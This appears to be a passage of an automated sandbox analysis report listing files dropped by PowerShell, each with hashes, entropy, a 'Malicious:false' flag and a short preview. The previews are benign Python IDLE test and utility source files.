                                                                                                    Size (bytes):27629
                                                                                                    Entropy (8bit):4.610259264522899
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:6+xTHGAImbl2qzwq1+rwWoOeoztB+JQluFC37CcB1XlQz+JHPdc:6+xTHfJ+rD9oQ7R/O
                                                                                                    MD5:8A00164EBD4C1B90FB3AB7B59A9E5E4C
                                                                                                    SHA1:7EF5AAE52C380CAD7C9AAE85FDAC223BBD475D2F
                                                                                                    SHA-256:4E02C11E74350B5D57E0616627AB185D5251A4C1902C7A166A36F776390F0DA0
                                                                                                    SHA-512:5C46E696BCB07128648D80F56A169E8F19013990C4FC71CDB167977AF02B2CBD54605B90474FF0B884510902A2BA312A472F7D87AB78434F2FF1818B22AF615D
                                                                                                    Malicious:false
                                                                                                    Preview:"""Test sidebar, coverage 85%"""..from textwrap import dedent..import sys....from itertools import chain..import unittest..import unittest.mock..from test.support import requires, swap_attr..from test import support..import tkinter as tk..from idlelib.idle_test.tkinter_testing_utils import run_in_tk_mainloop....from idlelib.delegator import Delegator..from idlelib.editor import fixwordbreaks..from idlelib.percolator import Percolator..import idlelib.pyshell..from idlelib.pyshell import fix_x11_paste, PyShell, PyShellFileList..from idlelib.run import fix_scaling..import idlelib.sidebar..from idlelib.sidebar import get_end_linenumber, get_lineno......class Dummy_editwin:.. def __init__(self, text):.. self.text = text.. self.text_frame = self.text.master.. self.per = Percolator(text).. self.undo = Delegator().. self.per.insertfilter(self.undo).... def setvar(self, name, value):.. pass.... def getlineno(self, index):.. return int(fl
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20122
                                                                                                    Entropy (8bit):4.745638125263061
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:qNz0zajhvj0f33h+7pw6nMVw2xJ/xxYhdd:q10zq1wfh+7pw6nMXL/add
                                                                                                    MD5:196E0E73FFE5D2D14C81264970113914
                                                                                                    SHA1:83450E4B60E688C97AA2B9B3A4584DF6EBA48035
                                                                                                    SHA-256:C3FCD3087A680837EDABD847768B4B9C9E49D07B717E8A35A6E081D00CFE5A3E
                                                                                                    SHA-512:0DDF6DA87F18A263CF70D2F63660AF2386692C811B62E774156AAA8EAB4544B0FAABA8CC687987A342634C9093DD28533CAAA83E91A47BD3B8925EE62F3A0604
                                                                                                    Malicious:false
                                                                                                    Preview:"Test squeezer, coverage 95%"....from textwrap import dedent..from tkinter import Text, Tk..import unittest..from unittest.mock import Mock, NonCallableMagicMock, patch, sentinel, ANY..from test.support import requires....from idlelib.config import idleConf..from idlelib.percolator import Percolator..from idlelib.squeezer import count_lines_with_wrapping, ExpandingButton, \.. Squeezer..from idlelib import macosx..from idlelib.textview import view_text..from idlelib.tooltip import Hovertip....SENTINEL_VALUE = sentinel.SENTINEL_VALUE......def get_test_tk_root(test_instance):.. """Helper for tests: Create a root Tk object.""".. requires('gui').. root = Tk().. root.withdraw().... def cleanup_root():.. root.update_idletasks().. root.destroy().. test_instance.addCleanup(cleanup_root).... return root......class CountLinesTest(unittest.TestCase):.. """Tests for the count_lines_with_wrapping function.""".. def check(self, expected, text, linewidth):..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1032
                                                                                                    Entropy (8bit):4.574212437632088
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:XgrIoPANu5lV7zlUU25KmI+SfXlMpXl7tZkZal:XgrIot5lVXqPcXlM5l7j6al
                                                                                                    MD5:260649AF78677B91666A3206E4CF9FC9
                                                                                                    SHA1:E8E09CA23155865D90F6CA691701F3C1864CDC9A
                                                                                                    SHA-256:BB1E0F9E9587E303D724566751DE1D5964DC58AEA435531EFB026DEF43D722EA
                                                                                                    SHA-512:504BF9E24D327513709E0055E68356F1B2616385B597751244A0AA65D50B126FD1CA9FF8526FF29F47A1BB79312FAAC4938487C2C0F8B00EDF3C69388D3077F9
                                                                                                    Malicious:false
                                                                                                    Preview:"Test stackviewer, coverage 63%."....from idlelib import stackviewer..import unittest..from test.support import requires..from tkinter import Tk....from idlelib.tree import TreeNode, ScrolledCanvas......class StackBrowserTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.... requires('gui').. cls.root = Tk().. cls.root.withdraw().... @classmethod.. def tearDownClass(cls):.... cls.root.update_idletasks()..## for id in cls.root.tk.call('after', 'info'):..## cls.root.after_cancel(id) # Need for EditorWindow... cls.root.destroy().. del cls.root.... def test_init(self):.. try:.. abc.. except NameError as exc:.. sb = stackviewer.StackBrowser(self.root, exc).. isi = self.assertIsInstance.. isi(stackviewer.sc, ScrolledCanvas).. isi(stackviewer.item, stackviewer.StackTreeItem).. isi(stackviewer.node, TreeNode)......if __name__ == '__main__':..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1174
                                                                                                    Entropy (8bit):4.610107532682017
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:gpeS5rIAE7zlHRVmOUfgK9GKcQaXCl79KcMKYrBFal:Sp5rIAEX3soI6aQcNaPal
                                                                                                    MD5:7ABC742ED9E6EB1E3BB47E012A692B53
                                                                                                    SHA1:977DD1DC4879B64C12721060B4301EE3A5B71A6D
                                                                                                    SHA-256:D2760DA19ADD51C076B561934F8D6DFC14F2AA1459DB22EB56341A06659D33B4
                                                                                                    SHA-512:B359BA017AD33A6DC85BFB8D64C48A9892DF258A02D213861E061A2F88F3BA2C17BC4DF81181F7493E97F76098DD85AEFA80565FE5D51912F2D7DDDAAE633440
                                                                                                    Malicious:false
                                                                                                    Preview:"Test statusbar, coverage 100%."....from idlelib import statusbar..import unittest..from test.support import requires..from tkinter import Tk......class Test(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().... @classmethod.. def tearDownClass(cls):.. cls.root.update_idletasks().. cls.root.destroy().. del cls.root.... def test_init(self):.. bar = statusbar.MultiStatusBar(self.root).. self.assertEqual(bar.labels, {}).... def test_set_label(self):.. bar = statusbar.MultiStatusBar(self.root).. bar.set_label('left', text='sometext', width=10).. self.assertIn('left', bar.labels).. left = bar.labels['left'].. self.assertEqual(left['text'], 'sometext').. self.assertEqual(left['width'], 10).. bar.set_label('left', text='revised text').. self.assertEqual(left['text'], 'revised text').. bar.se
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7206
                                                                                                    Entropy (8bit):4.513183391055591
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:PR0rIs9ummFA2xwLdLLUaLxn5Lo93dl59e3JyC:PR2xswLdLLUaLxn5Lo93dDM0C
                                                                                                    MD5:11ABFC8E0B9D815531464D4E026A93A0
                                                                                                    SHA1:4214839C8EAA8486E68766A35E464F6D2708C5CD
                                                                                                    SHA-256:A2CBA8C23D68B6C26F08E525231491689092BADBC78948032F2A5F2A20484944
                                                                                                    SHA-512:59BF29DC7D5A9B9547E81A2EA4B701C2A27A7C2D71CAAA1F7DEA2EEF48A4591191A6D94A86D7A4BEA26A7AFC025F8F66D91C93DEC41A226D8B7BC08201514D45
                                                                                                    Malicious:false
                                                                                                    Preview:''' Test mock_tk.Text class against tkinter.Text class....Run same tests with both by creating a mixin class...'''..import unittest..from test.support import requires..from _tkinter import TclError....class TextTest:.. "Define items common to both sets of tests.".... hw = 'hello\nworld' # Several tests insert this after initialization... hwn = hw+'\n' # \n present at initialization, before insert.... # setUpClass defines cls.Text and maybe cls.root... # setUp defines self.text from Text and maybe root..... def test_init(self):.. self.assertEqual(self.text.get('1.0'), '\n').. self.assertEqual(self.text.get('end'), '').... def test_index_empty(self):.. index = self.text.index.... for dex in (-1.0, 0.3, '1.-1', '1.0', '1.0 lineend', '1.end', '1.33',.. 'insert'):.. self.assertEqual(index(dex), '1.0').... for dex in 'end', 2.0, '2.1', '33.44':.. self.assertEqual(index(dex), '2.0').... def test_
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7597
                                                                                                    Entropy (8bit):4.714300449733398
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:LQ3Z6hDKlsmWoyxQxXQKiY9/Mj36/xj34k:G6hOKmWlxQtfiYI3k3D
                                                                                                    MD5:76DFE6B6F8303C183DA6BA22BAD7F0FF
                                                                                                    SHA1:7390FCAE0EE0B1CB277EB64936EA2BB658469059
                                                                                                    SHA-256:06DA4E9636798407C88563A0B734B8E68E1008A48333612406DAA4D6B0EA6382
                                                                                                    SHA-512:CC2D5156C1A07E5300D37F9E66D996C9F9AF58726CE06B4C00890913888DCF29791C36FA30A6324339DAAB389C09AB45A2F61B4AC45B97079E98609D155333E8
                                                                                                    Malicious:false
                                                                                                    Preview:"""Test textview, coverage 100%.....Since all methods and functions create (or destroy) a ViewWindow, which..is a widget containing a widget, etcetera, all tests must be gui tests...Using mock Text would not change this. Other mocks are used to retrieve..information about calls..."""..from idlelib import textview as tv..from test.support import requires..requires('gui')....import os..import unittest..from tkinter import Tk, TclError, CHAR, NONE, WORD..from tkinter.ttk import Button..from idlelib.idle_test.mock_idle import Func..from idlelib.idle_test.mock_tk import Mbox_func....def setUpModule():.. global root.. root = Tk().. root.withdraw()....def tearDownModule():.. global root.. root.update_idletasks().. root.destroy().. del root....# If we call ViewWindow or wrapper functions with defaults..# modal=True, _utest=False, test hangs on call to wait_window...# Have also gotten tk error 'can't invoke "event" command'.......class VW(tv.ViewWindow): # Used in ViewWin
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5546
                                                                                                    Entropy (8bit):4.646901203049652
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:L6Crf0C5JU7Cxj6OU2QzL4neQ8v0qQb3QB0JFekbqQnacXqQnacuCtR1GBqQwaBK:LF86xiUkcnnJFekbucXucuCtrGBtBV6h
                                                                                                    MD5:6B7D9233BB4566047E5D6B7D862A9908
                                                                                                    SHA1:1077291B0C5EB9EE57ABB9EA4244293EE7888985
                                                                                                    SHA-256:B2F02F500266A3EF9047F631AC8AA2596F9FA59686A691F2C2E6DB4788BB0DDA
                                                                                                    SHA-512:439919C965B75576FFF57E747C860C118C4FE6BA8E92D7F35156195CBB4FED0A8C478CCB2F1F86FC6FED8FCA2BBE5A0B1205F392B9D1CDD7C2BA55ED75EEF052
                                                                                                    Malicious:false
                                                                                                    Preview:"""Test tooltip, coverage 100%.....Coverage is 100% after excluding 6 lines with "# pragma: no cover"...They involve TclErrors that either should or should not happen in a..particular situation, and which are 'pass'ed if they do..."""....from idlelib.tooltip import TooltipBase, Hovertip..from test.support import requires..requires('gui')....from functools import wraps..import time..from tkinter import Button, Tk, Toplevel..import unittest......def setUpModule():.. global root.. root = Tk()....def tearDownModule():.. global root.. root.update_idletasks().. root.destroy().. del root......def add_call_counting(func):.. @wraps(func).. def wrapped_func(*args, **kwargs):.. wrapped_func.call_args_list.append((args, kwargs)).. return func(*args, **kwargs).. wrapped_func.call_args_list = [].. return wrapped_func......def _make_top_and_button(testobj):.. global root.. top = Toplevel(root).. testobj.addCleanup(top.destroy).. top.title("Test
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1812
                                                                                                    Entropy (8bit):4.568356827769023
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:LEvS1WrbjL2kzlHm/LCKMDsWl52C59mqEMo0aBAlNWNRScQRSc9FxN+itlUDsal:L1QrfL2M/7suQxq3zaB3NRbQRbvUDsal
                                                                                                    MD5:7E0F964F0DDE0952EF41052AA2506A5C
                                                                                                    SHA1:ABAC523BA59B680778280B9A7DACF9323DCCD9A2
                                                                                                    SHA-256:266AD30F2F7A299A15AE7F2222568FB318276FAF74BE49F08B8B483692040931
                                                                                                    SHA-512:1EDD44C19DA568352AC45E78D5CE16D8C876022C2A33660200C6ED9A0AFFB2A43FF6A92C590D932E62C55A7A0C026F23A67F9D7FD6A8B4BB38706B9745ECFB8D
                                                                                                    Malicious:false
                                                                                                    Preview:"Test tree. coverage 56%."....from idlelib import tree..import unittest..from test.support import requires..requires('gui')..from tkinter import Tk, EventType, SCROLL......class TreeTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. cls.root = Tk().. cls.root.withdraw().... @classmethod.. def tearDownClass(cls):.. cls.root.destroy().. del cls.root.... def test_init(self):.. # Start with code slightly adapted from htest... sc = tree.ScrolledCanvas(.. self.root, bg="white", highlightthickness=0, takefocus=1).. sc.frame.pack(expand=1, fill="both", side='left').. item = tree.FileTreeItem(tree.ICONDIR).. node = tree.TreeNode(sc.canvas, None, item).. node.expand()......class TestScrollEvent(unittest.TestCase):.... def test_wheel_event(self):.. # Fake widget class containing `yview` only... class _Widget:.. def __init__(widget, *expected):..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4363
                                                                                                    Entropy (8bit):4.540531393241992
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:o7rf0D8CiY0wU7MYzIYRysYzwGkkAcfgyGdsnFGfC:skdU7MYzIYRysYdkkARyGdscfC
                                                                                                    MD5:6EE8DE74FCACA625F726D32BCAB1D3CC
                                                                                                    SHA1:4F1A5B00B9EFDB79293010B39593EED8E769BDDF
                                                                                                    SHA-256:FF7DFF12D672FD67D763456EA3267077BFC8EAA6C46C1DFCD9185CC61E5615FD
                                                                                                    SHA-512:3FEA7446C9A4B53D2FD845111192FA4B2B8A88D806CAC1A3249ABFB61111E1D7B50D7BFA711CA4F162461F06D4D64B49C48D0A0A8AA98169A3CCDBF4299E2029
                                                                                                    Malicious:false
                                                                                                    Preview:"Test undo, coverage 77%."..# Only test UndoDelegator so far.....from idlelib.undo import UndoDelegator..import unittest..from test.support import requires..requires('gui')....from unittest.mock import Mock..from tkinter import Text, Tk..from idlelib.percolator import Percolator......class UndoDelegatorTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. cls.root = Tk().. cls.text = Text(cls.root).. cls.percolator = Percolator(cls.text).... @classmethod.. def tearDownClass(cls):.. cls.percolator.redir.close().. del cls.percolator, cls.text.. cls.root.destroy().. del cls.root.... def setUp(self):.. self.delegator = UndoDelegator().. self.delegator.bell = Mock().. self.percolator.insertfilter(self.delegator).... def tearDown(self):.. self.percolator.removefilter(self.delegator).. self.text.delete('1.0', 'end').. self.delegator.resetcache().... def test_undo_event(
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):322
                                                                                                    Entropy (8bit):4.684750456551524
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:np5oHX0hT3FvCGxwtsXrz2cbECyAhXfa5N4bCFAjaj/jVv:njBhT3F6iERABhb02aLJv
                                                                                                    MD5:3C9F4D860E4ACB9BA819649F906BAF3B
                                                                                                    SHA1:0250E71448DF2725D378E8C26F9346AEFFDB0442
                                                                                                    SHA-256:8B2ACDFBBBC13AB1D92ECCD56D2FB8F2DD31EE03A2B0D46E21B7F7E0DCCF7902
                                                                                                    SHA-512:0CF78E7606E8EB25F8A2537F774E8B7D948F5608F304D6E85538018970907D16AD0FBBD1158426D8971AF85C5410C59B799F568BF732E6FB396808CC44CA8A6A
                                                                                                    Malicious:false
                                                                                                    Preview:"""Test util, coverage 100%"""....import unittest..from idlelib import util......class UtilTest(unittest.TestCase):.. def test_extensions(self):.. for extension in {'.pyi', '.py', '.pyw'}:.. self.assertIn(extension, util.py_extensions)......if __name__ == '__main__':.. unittest.main(verbosity=2)..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2813
                                                                                                    Entropy (8bit):4.693564963010456
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:cWbcuURbNpDr780utRYdZ7QHrub0AFJTM6T4QC8irsPb0YJTM6TXal:55URJpDrwj+nJzTZTc6hTZTXk
                                                                                                    MD5:DDA4E251A2594D78C7CE572A488F7BDF
                                                                                                    SHA1:D56343257B801D9173A44ED24F1C0C911065FF72
                                                                                                    SHA-256:2C47F4EBCDB0FA7670DF468F9E6E7808D2AA1EBCB6A37DEEBCB5FF6D4B4F3F6E
                                                                                                    SHA-512:E4FBC5A74E5720C8F9657A7377ED892A3ADE81C619EC920E2945D5EB955D4493DBE0AC0EBD516D56F77CC7221ADC77D9B049FBC1F25B6037CDCECA4CC3408AE5
                                                                                                    Malicious:false
                                                                                                    Preview:'''Test warnings replacement in pyshell.py and run.py.....This file could be expanded to include traceback overrides..(in same two modules). If so, change name...Revise if output destination changes (http://bugs.python.org/issue18318)...Make sure warnings module is left unaltered (http://bugs.python.org/issue18081)...'''..from idlelib import run..from idlelib import pyshell as shell..import unittest..from test.support import captured_stderr..import warnings....# Try to capture default showwarning before Idle modules are imported...showwarning = warnings.showwarning..# But if we run this file within idle, we are in the middle of the run.main loop..# and default showwarnings has already been replaced...running_in_idle = 'idle' in showwarning.__name__....# The following was generated from pyshell.idle_formatwarning..# and checked as matching expectation...idlemsg = '''..Warning (from warnings module):.. File "test_warning.py", line 99.. Line of code..UserWarning: Test..'''..shellmsg =
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1120
                                                                                                    Entropy (8bit):4.631177743431976
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:bphTRLj0RpHoRjrzWhfWDYwJAHSppOj7ze4Xj3hrAea2NZBhYHGQwjusdf3PV02k:bpj0rIbhCh7zldU25Km+shXal
                                                                                                    MD5:8796A4EE770B7E5B05C911A548AAF38D
                                                                                                    SHA1:BFF9F130E6311C4C11192E640A51FCBDB09651A1
                                                                                                    SHA-256:A05CBCC546301152A9CE43D537D6B21C2318355F33BFCC38A785FACCC8751500
                                                                                                    SHA-512:4249A2C77CF52E8E954141DA1F7647B8396F14E08FA1060CADC1997CD819778935D966E3D46276D9C739EAB845D951FC146F11A93948264663F1E26A7BC26AA9
                                                                                                    Malicious:false
                                                                                                    Preview:"Test window, coverage 47%."....from idlelib import window..import unittest..from test.support import requires..from tkinter import Tk......class WindowListTest(unittest.TestCase):.... def test_init(self):.. wl = window.WindowList().. self.assertEqual(wl.dict, {}).. self.assertEqual(wl.callbacks, []).... # Further tests need mock Window.......class ListedToplevelTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. window.registry = set().. requires('gui').. cls.root = Tk().. cls.root.withdraw().... @classmethod.. def tearDownClass(cls):.. window.registry = window.WindowList().. cls.root.update_idletasks()..## for id in cls.root.tk.call('after', 'info'):..## cls.root.after_cancel(id) # Need for EditorWindow... cls.root.destroy().. del cls.root.... def test_init(self):.... win = window.ListedToplevel(self.root).. self.assertIn(win, window.regist
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1038
                                                                                                    Entropy (8bit):4.613318204928801
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:B7Y9rIXJB6eE7zN4Rr8Rg2fKmbV6oHsHz6o5CV6oFrYal:B78rIXJYeEXCaxTEoHsHmo8EoGal
                                                                                                    MD5:52F237CB98FE67EA12732AB24388C08C
                                                                                                    SHA1:61F108DFC43DC5FD4269E69DA84979CFA71158FB
                                                                                                    SHA-256:2E4DA36EBE1543CFCA2531AD87053188E12764D28A8DDFEE2749800C2DF3A4BD
                                                                                                    SHA-512:3ABFB6EAD8CD086D9712E174962DCE9C8C1D9D60A32D91FA5B2EED58EFA76D494E14E8A95EAFD2E5B5C715E05F473E9CC40C3DCF71C85540A8F1C9CD4651BBB2
                                                                                                    Malicious:false
                                                                                                    Preview:"Test zoomheight, coverage 66%."..# Some code is system dependent.....from idlelib import zoomheight..import unittest..from test.support import requires..from tkinter import Tk..from idlelib.editor import EditorWindow......class Test(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().. cls.editwin = EditorWindow(root=cls.root).... @classmethod.. def tearDownClass(cls):.. cls.editwin._close().. cls.root.update_idletasks().. for id in cls.root.tk.call('after', 'info'):.. cls.root.after_cancel(id) # Need for EditorWindow... cls.root.destroy().. del cls.root.... def test_init(self):.. zoom = zoomheight.ZoomHeight(self.editwin).. self.assertIs(zoom.editwin, self.editwin).... def test_zoom_height_event(self):.. zoom = zoomheight.ZoomHeight(self.editwin).. zoom.zoom_height_event()......if __name__ == '__main
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4607
                                                                                                    Entropy (8bit):4.647937908558207
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:zurI0RoJ1Ob/bVfkKwkvx8GRHcSLLkyZsEC55yZlk:QaGbVfnx8GSSLLkyZ255yZlk
                                                                                                    MD5:D2D09537C5BB6897E5FC5CB3FA964228
                                                                                                    SHA1:B14C428B0B375D69C72D48C085EDDAE21A819BFA
                                                                                                    SHA-256:AB488206E6B0F6C4F0E5CBF626A2BD3A13B123EF11B009558CF97A8876ACADCB
                                                                                                    SHA-512:DC03CDB967CEDBEE8CEC2D45441B06AF629161F8222D4A92E63FF0BC781F8E2C24F8460E15A202304622D7727474E52E84E92D13691F097F109AE1F96DE00BC2
                                                                                                    Malicious:false
                                                                                                    Preview:"Test zzdummy, coverage 100%."....from idlelib import zzdummy..import unittest..from test.support import requires..from tkinter import Tk, Text..from unittest import mock..from idlelib import config..from idlelib import editor..from idlelib import format......usercfg = zzdummy.idleConf.userCfg..testcfg = {.. 'main': config.IdleUserConfParser(''),.. 'highlight': config.IdleUserConfParser(''),.. 'keys': config.IdleUserConfParser(''),.. 'extensions': config.IdleUserConfParser(''),..}..code_sample = """\....class C1:.. # Class comment... def __init__(self, a, b):.. self.a = a.. self.b = b.."""......class DummyEditwin:.. get_selection_indices = editor.EditorWindow.get_selection_indices.. def __init__(self, root, text):.. self.root = root.. self.top = root.. self.text = text.. self.fregion = format.FormatRegion(self).. self.text.undo_block_start = mock.Mock().. self.text.undo_block_stop = mock.Mock()......class Z
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2395
                                                                                                    Entropy (8bit):4.281607901019118
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:AYnzOqkWlTtrfYbxMYdDgUPldFXLwGsCsuMj2Zg6Zd2I9gw:AYyWlTJQl1dxhZ1Mjj6bV9gw
                                                                                                    MD5:45A7D8B634B59D6EA76EB579A06AF8E4
                                                                                                    SHA1:5AF8DF58A2FB9905FEA785E8DC5C652F02FEF33C
                                                                                                    SHA-256:FD23AB4162889E63C2240F324CF0CB654B49E17306D0A114CCD7D32C99E636ED
                                                                                                    SHA-512:F26638F525F2ADC7087A06273E6451701624510E3851D769A2D49209DA75C962FB3625BA1A97CDEC3C3912B1417CF409FEB6762BBA4C9415022DD9FF9518C80B
                                                                                                    Malicious:false
                                                                                                    Preview:"""Utilities for testing with Tkinter"""..import functools......def run_in_tk_mainloop(delay=1):.. """Decorator for running a test method with a real Tk mainloop..... This starts a Tk mainloop before running the test, and stops it.. at the end. This is faster and more robust than the common.. alternative method of calling .update() and/or .update_idletasks()..... Test methods using this must be written as generator functions,.. using "yield" to allow the mainloop to process events and "after".. callbacks, and then continue the test from that point..... The delay argument is passed into root.after(...) calls as the number.. of ms to wait before passing execution back to the generator function..... This also assumes that the test class has a .root attribute,.. which is a tkinter.Tk object..... For example (from test_sidebar.py):.... @run_test_with_tk_mainloop().. def test_single_empty_input(self):.. self.do_input('\n').. yield..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16600
                                                                                                    Entropy (8bit):4.26433380745449
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:CvdzdFADnaJAsvQ0gL1/GC/ecHu1mo6Cad/MhLftDjkm4U/beRPuSomGdDUySYS3:Cvd0svQKFcHu1B6Cai1tn41dB
                                                                                                    MD5:97CCCF70FDB27EC63B2A32B605D7C0C5
                                                                                                    SHA1:D9F289E28306E8A6161A78C5627F458F83C8EFFF
                                                                                                    SHA-256:75FC4558F705A521AAA76CD8961DE8E86147E329C57F2496152F1828B2B53261
                                                                                                    SHA-512:775C2A39D813CD0E80294E9CD80F9C7B55037659D9B0940E6DE3622A3BBFC9F92097D131F560A976E5105FED0FF8F6C2D0EA96AB9AA92B7DD355C02371A357B5
                                                                                                    Malicious:false
                                                                                                    Preview:import io..import os..import shlex..import sys..import tempfile..import tokenize....from tkinter import filedialog..from tkinter import messagebox..from tkinter.simpledialog import askstring # loadfile encoding.....from idlelib.config import idleConf..from idlelib.util import py_extensions....py_extensions = ' '.join("*"+ext for ext in py_extensions)..encoding = 'utf-8'..errors = 'surrogatepass' if sys.platform == 'win32' else 'surrogateescape'......class IOBinding:..# One instance per editor Window so methods know which to save, close...# Open returns focus to self.editwin if aborted...# EditorWindow.open_module, others, belong here..... def __init__(self, editwin):.. self.editwin = editwin.. self.text = editwin.text.. self.__id_open = self.text.bind("<<open-window-from-file>>", self.open).. self.__id_save = self.text.bind("<<save-window>>", self.save).. self.__id_saveas = self.text.bind("<<save-window-as-file>>",..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9568
                                                                                                    Entropy (8bit):4.732663895198348
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:gAqE3nXR2RQRORAgCGoCbFcs9mActWC+fP4fF6T+f08RTE9NwraT9:7qEXB8yUARGoQFG+fP4fkSf08wwi
                                                                                                    MD5:A97F7613301F93E12746F1E9BBA04296
                                                                                                    SHA1:F7081C142629CF97E41CFAE22C787293A1ACE51C
                                                                                                    SHA-256:5D3EE0333AD49EA68DCB4B1CDB695C9A7005BB74CB4807E3843D82A9343F7827
                                                                                                    SHA-512:070154603AD85A6596EFF017A14637B7F318503248671525DEF6DC852FD1850B00D7500D8865CB23B56E23E9FF64BC8DF2AA2D32CAD066C711B1B93E185962F0
                                                                                                    Malicious:false
                                                                                                    Preview:"""..A number of functions that enhance IDLE on macOS..."""..from os.path import expanduser..import plistlib..from sys import platform # Used in _init_tk_type, changed by test.....import tkinter......## Define functions that query the Mac graphics type...## _tk_type and its initializer are private to this section....._tk_type = None....def _init_tk_type():.. """ Initialize _tk_type for isXyzTk functions..... This function is only called once, when _tk_type is still None... """.. global _tk_type.. if platform == 'darwin':.... # When running IDLE, GUI is present, test/* may not be... # When running tests, test/* is present, GUI may not be... # If not, guess most common. Does not matter for testing... from idlelib.__init__ import testing.. if testing:.. from test.support import requires, ResourceDenied.. try:.. requires('gui').. except ResourceDenied:.. _tk_type = "cocoa"..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4064
                                                                                                    Entropy (8bit):5.005631724752357
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:iUGINklQyEVPzGfk108ditQOF6WFydTqA:5e0OkOtUWEtqA
                                                                                                    MD5:EAE124B51DFBBAF7FC5AB8233C11467B
                                                                                                    SHA1:B296C18D03F0EE883A5079056CEAE3864DF2CB9B
                                                                                                    SHA-256:0873AA2511C4518588021AA884FA250B8D961D1A22BA0BDF11F965ECCC76DB65
                                                                                                    SHA-512:F764AD36FB79DD26343A5869EEA9F08BFA7787B62984FCF78F823EA28507E09C51CCC0CC00151ACA3ABC723CE8FF379AFEE0050777DB8161FA1A5084C5D51BBC
                                                                                                    Malicious:false
